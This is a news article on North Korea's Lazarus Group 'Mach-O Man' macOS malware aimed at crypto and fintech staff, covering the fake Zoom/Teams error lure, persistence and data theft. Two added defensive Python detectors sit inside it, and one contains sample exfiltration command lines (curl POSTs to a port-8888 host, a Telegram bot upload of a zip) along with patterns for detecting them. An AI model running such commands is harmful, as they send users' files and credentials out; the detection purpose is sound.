North Korea’s Lazarus Group launches new malware kit targeting macOS users in crypto, fintech

Source Cryptopolitan

North Korea’s Lazarus Group has launched advanced malware targeting macOS devices. Called Mach-O Man, it is designed to target crypto companies, fintech organizations, and key executives who use Macs for financial transactions.

The attack was first identified in the middle of April 2026. It uses popular workplace apps such as Zoom, Microsoft Teams, and Google Meet to launch social engineering attacks.

North Korea’s hackers go after Mac users

As reported, this attack leverages the trust employees place in their regular communication tools, such as Zoom, Microsoft Teams, and Google Meet. This has turned everyday collaboration into an avenue for system-level attacks.

The first step is a carefully crafted social engineering lure sent through Telegram. The victims (developers, executives, and decision makers in the fintech and crypto space) receive an urgent meeting invite from a compromised colleague’s account.

Clicking the link leads to a seemingly authentic webpage that simulates an error message when trying to connect to Zoom, Teams, or Meet. The website then asks the victim to copy and paste a seemingly harmless line of code into the Mac’s Terminal to “solve” the problem.

In doing so, the victim unknowingly circumvents macOS security mechanisms such as Gatekeeper, since the execution originates from the victim themselves.

Upon execution, the code installs a binary named teamsSDK.bin.

The stager downloads the fake macOS app bundle and digitally signs it with the native codesign tool using an ad hoc signature. It then repeatedly asks the victim for their password, displaying poorly translated messages that appear authentic. 

[Image: Mach-O Man malware installation on fake apps. Source: AnyRun]

After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation.

Unlike techniques that rely on complex exploits, this one requires none. This makes it very effective against valuable targets who may be juggling several simultaneous calls and copying commands without verifying them.

Inside the Mach-O Man malware

The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes.

It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999.

The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.”
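A defender can audit LaunchAgents for this persistence pattern. The following is an added example, not code from the article or from AnyRun: it parses LaunchAgent plists and flags the reported file name, OneDrive/Antivirus masquerading, and autorun from suspect paths. The trusted label prefixes, trusted roots, suspect paths and all sample plists are assumptions constructed for illustration.

```python
import plistlib
from pathlib import PurePosixPath

# Indicator named in the article: the LaunchAgent file dropped by minst2.bin.
KNOWN_BAD_PLIST = "com.onedrive.launcher.plist"
# Names the article says the agent poses as.
MASQUERADE_NAMES = ("onedrive", "antivirus")
# Assumptions for this sketch: vendor agents use these label prefixes and run
# from these roots; a user-level dropper tends to use the suspect paths below.
TRUSTED_LABEL_PREFIXES = ("com.microsoft.", "com.apple.")
TRUSTED_PROGRAM_ROOTS = ("/Applications/", "/System/", "/Library/")
SUSPECT_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")


def program_of(plist):
    """Executable a LaunchAgent starts: Program, else ProgramArguments[0]."""
    if plist.get("Program"):
        return str(plist["Program"])
    args = plist.get("ProgramArguments") or []
    return str(args[0]) if args else ""


def in_suspect_location(program):
    """True for temp/shared directories or any hidden path component."""
    hidden = any(p.startswith(".") for p in PurePosixPath(program).parts)
    return hidden or program.startswith(SUSPECT_PREFIXES)


def audit_launch_agent(filename, raw):
    """Return a list of finding codes for one LaunchAgent plist (bytes)."""
    try:
        plist = plistlib.loads(raw)
    except Exception:  # malformed XML or unrecognised plist format
        return ["unparseable"]
    if not isinstance(plist, dict):
        return ["unparseable"]

    label = str(plist.get("Label", ""))
    program = program_of(plist)
    findings = []

    # 1. Exact match on the file name (or label) reported in the article.
    if KNOWN_BAD_PLIST in (filename.lower(), label.lower() + ".plist"):
        findings.append("known-ioc")

    # 2. Claims to be OneDrive/Antivirus without a vendor label and path.
    claimed = f"{label} {PurePosixPath(program).name}".lower()
    trusted = (label.lower().startswith(TRUSTED_LABEL_PREFIXES)
               and program.startswith(TRUSTED_PROGRAM_ROOTS))
    if any(name in claimed for name in MASQUERADE_NAMES) and not trusted:
        findings.append("masquerade")

    # 3. Starts at every login from a location any user process can write.
    if plist.get("RunAtLoad") is True and in_suspect_location(program):
        findings.append("autorun-suspect-path")
    return findings


def _sample(label, program, run_at_load=True):
    """Build a constructed LaunchAgent plist for the demo."""
    return plistlib.dumps({"Label": label,
                           "ProgramArguments": [program],
                           "RunAtLoad": run_at_load})


# Constructed samples; only the first file name comes from the article.
SAMPLES = {
    "com.onedrive.launcher.plist": _sample(
        "com.onedrive.launcher",
        "/Users/alice/Library/Application Support/.onedrive/OneDrive"),
    "com.example.avservice.plist": _sample(
        "com.example.avservice", "/tmp/Antivirus Service"),
    "com.microsoft.example.sync.plist": _sample(
        "com.microsoft.example.sync",
        "/Applications/OneDrive.app/Contents/MacOS/OneDrive"),
}


def audit_directory(samples):
    """Audit a {filename: bytes} mapping, e.g. read from ~/Library/LaunchAgents."""
    return {name: audit_launch_agent(name, raw) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, findings in audit_directory(SAMPLES).items():
        print(f"{name}: {findings or 'clean'}")
```

On a real host, build the mapping from the files in ~/Library/LaunchAgents and /Library/LaunchAgents; the masquerade rule is a heuristic and needs a local allowlist to avoid false positives.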

Macrasv2, the last payload responsible for stealing data from the system, collects browser login details and cookies from SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped and sent out via the Telegram bot API; the bot token was left exposed.
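The behaviours described in this section also show up in process command lines. The following is an added example, not code from the article or from AnyRun: it classifies logged command lines for ad hoc codesign use, curl POSTs to ports 8888 or 9999, and Telegram bot API calls. Every event, host, path and token placeholder below is constructed for illustration.

```python
import re
import shlex
from pathlib import PurePosixPath
from urllib.parse import urlsplit

C2_PORTS = {8888, 9999}  # ports named in the article
POST_FLAGS = {"-d", "-F", "--form"}
TELEGRAM_BOT = re.compile(r"api\.telegram\.org/bot", re.I)
SIGN_FLAG = re.compile(r"^(--sign|-[A-Za-z]*s)$")  # -s, -fs, --sign


def _url_port(token):
    """Explicit port of an http(s) URL argument, else None."""
    if not token.lower().startswith(("http://", "https://")):
        return None
    try:
        return urlsplit(token).port
    except ValueError:  # non-numeric or out-of-range port
        return None


def is_curl_post_to_c2_port(argv):
    """curl with POST semantics whose URL names port 8888 or 9999."""
    if not argv or PurePosixPath(argv[0]).name != "curl":
        return False
    posts = any(t in POST_FLAGS or t.startswith("--data") or t.upper() == "-XPOST"
                for t in argv)
    posts = posts or any(a in ("-X", "--request") and b.upper() == "POST"
                         for a, b in zip(argv, argv[1:]))
    return posts and any(_url_port(t) in C2_PORTS for t in argv)


def is_adhoc_codesign(argv):
    """codesign invoked with the ad hoc identity, i.e. '-' after the sign flag."""
    if not argv or PurePosixPath(argv[0]).name != "codesign":
        return False
    return any(SIGN_FLAG.match(a) and b == "-" for a, b in zip(argv, argv[1:]))


def classify(cmdline):
    """Return the rule names one logged command line matches."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in a truncated log line
        argv = cmdline.split()
    hits = []
    if is_adhoc_codesign(argv):
        hits.append("adhoc-codesign")
    if is_curl_post_to_c2_port(argv):
        hits.append("curl-post-c2-port")
    if TELEGRAM_BOT.search(cmdline):
        hits.append("telegram-bot-api")
    return hits


# Constructed process-execution events (203.0.113.0/24 is a documentation range).
EVENTS = [
    {"pid": 501, "cmd": "codesign --force --deep --sign - /Users/alice/Downloads/Example.app"},
    {"pid": 502, "cmd": "curl -s -X POST -d @/tmp/profile.json http://203.0.113.10:8888/upload"},
    {"pid": 503, "cmd": "curl -s -F document=@/tmp/out.zip "
                        "https://api.telegram.org/bot<REDACTED>/sendDocument"},
    {"pid": 504, "cmd": "curl -fsSL https://example.com:8888/health"},
    {"pid": 505, "cmd": "codesign --verify --deep /Applications/Safari.app"},
    {"pid": 506, "cmd": "codesign -s 'Developer ID Application: Example Corp' /tmp/build/App.app"},
]


def triage(events):
    """Map pid -> matched rules, keeping only events that matched something."""
    out = {}
    for ev in events:
        hits = classify(ev["cmd"])
        if hits:
            out[ev["pid"]] = hits
    return out


def stages_seen(events):
    """Distinct rules matched on a host; several together are a stronger signal."""
    return sorted({h for hits in triage(events).values() for h in hits})


if __name__ == "__main__":
    for pid, hits in triage(EVENTS).items():
        print(pid, hits)
    print("stages:", stages_seen(EVENTS))
```

Each rule alone can fire on legitimate developer activity, so treat a single hit as context and several on one host as the alert.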

Lazarus Group’s devastating legacy in crypto and US tech

The launch of “Mach-O Man” is in line with Lazarus Group’s long-running efforts to carry out cyberattacks for financial gain. These attacks have resulted in huge losses for the crypto world, especially for those based in the United States.

This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO, the $285 million theft from Drift, and $235 million from WazirX.
